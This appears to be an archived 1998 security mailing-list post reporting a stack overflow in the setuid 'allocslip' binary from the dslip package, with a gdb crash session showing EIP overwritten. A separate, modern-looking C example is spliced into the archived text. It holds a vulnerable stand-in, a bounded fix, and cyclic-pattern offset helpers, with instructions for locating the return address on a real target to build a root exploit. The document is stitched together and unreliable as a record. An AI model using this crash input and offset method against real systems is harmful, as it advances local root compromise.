allocslip

From: CyberPsychotic (fygraveat_private)
Date: Sat Jul 04 1998 - 09:10:54 PDT


    I have the feeling that allocslip in the dslip package has an overflow
    in it (since it's setuid it should bring a root shell with a careful
    exploit).
    
    Here's how I tested it:
    package Dslip, version 2.03
    (sunsite.unc.edu/pub/Linux/system/Network/serial/dslip203.tgz)
    The package is rather old, but I found it being used on some Linux
    machines around.
     gdb allocslip
    
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc...
    (no debugging symbols found)...
    (gdb) run b_s `perl -e 'printf "A" x 300'`
    [usual GDB messages]
    GO! sh: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: command
    not found
    
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb)
    
    info registers shows:
    ebp 0x41414141 0x41414141
    esi 0x40001fb0 1073749936
    edi 0x80487f8  134514680
    eip 0x41414141 0x41414141
    
    
    Obviously the stack is smashed.
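The following is an added example and is not code from dslip or from the poster. It is a constructed stand-in for the pattern the gdb session suggests (a command-line argument copied into a fixed stack buffer and then handed to sh, which is consistent with "sh: AAAA...: command not found" followed by a fault at 0x41414141, but has not been verified against the dslip source), placed beside a bounded version that refuses oversized or shell-metacharacter arguments. It also includes a cyclic-pattern helper, the usual next step after seeing EIP = 0x41414141: instead of 300 identical bytes, run with a pattern whose every 4-byte window is unique, and the value left in EIP gives the offset of the saved return address. CMD_LEN and the function names are assumptions for illustration only.

```c
/* Added example (not dslip's code). Assumed mechanism: argv string copied
 * into a fixed stack buffer, then passed to sh. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define CMD_LEN 64   /* assumed buffer size for the stand-in; not from dslip */

/* Unsafe stand-in for the observed behaviour: an argument longer than
 * CMD_LEN overruns cmd, then the saved EBP and the return address, which is
 * why gdb stops at "0x41414141 in ?? ()" after 300 'A's. Never called here. */
void unsafe_run(const char *arg)
{
    char cmd[CMD_LEN];
    strcpy(cmd, arg);        /* unbounded copy: the overflow */
    system(cmd);             /* string reaches sh: "sh: ...: command not found" */
}

/* Bounded replacement: reject (do not silently truncate) arguments that do
 * not fit, and reject shell metacharacters because the string reaches sh.
 * Returns 0 and fills cmd on success, -1 on rejection. */
static int safe_build(const char *arg, char *cmd, size_t cmdlen)
{
    if (strlen(arg) >= cmdlen)
        return -1;
    if (strpbrk(arg, ";&|`$<>()\n\"'\\") != NULL)
        return -1;
    int n = snprintf(cmd, cmdlen, "%s", arg);
    return (n < 0 || (size_t)n >= cmdlen) ? -1 : 0;
}

/* Wrappers standing in for the two runs: a normal argument such as "b_s",
 * and the 300 'A's from perl -e 'printf "A" x 300'. */
int check_argument(const char *arg)
{
    char cmd[CMD_LEN];
    return safe_build(arg, cmd, sizeof cmd);
}

int check_repeated(char ch, size_t count)
{
    char *arg = malloc(count + 1);
    if (arg == NULL)
        return -1;
    memset(arg, ch, count);
    arg[count] = '\0';
    int rc = check_argument(arg);
    free(arg);
    return rc;
}

/* Cyclic "Aa0Aa1Aa2..." pattern: every 4-byte window is unique for the first
 * 26*26*10*3 = 20280 bytes, so the value that lands in EIP identifies the
 * offset of the saved return address. out needs room for len + 1 bytes. */
size_t cyclic_pattern(char *out, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                const char chunk[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = chunk[i];
            }
    out[n] = '\0';
    return n;
}

/* Offset within a 300-byte pattern of the 32-bit value seen in EIP. x86 is
 * little-endian, so the low byte of EIP is the first byte written on the
 * stack. Returns -1 if the value is not from the pattern (e.g. 0x41414141). */
long offset_for(uint32_t eip)
{
    char pat[301];
    size_t len = cyclic_pattern(pat, 300);
    char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)(eip >> (8 * i));
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    char pat[301];
    cyclic_pattern(pat, 300);
    printf("pattern: %.24s...\n", pat);
    printf("300 x 'A' accepted? %s\n",
           check_repeated('A', 300) == 0 ? "yes" : "no (rejected)");
    printf("offset of EIP=0x41346141 in pattern: %ld\n", offset_for(0x41346141u));
    return 0;
}
```

To use the pattern against a real target, pass the output of cyclic_pattern as the argument instead of the 300 'A's, read EIP from info registers, and feed it to offset_for; that offset is where the return address sits relative to the start of the buffer, which is what a working exploit needs to know before anything else.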
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:02:07 PDT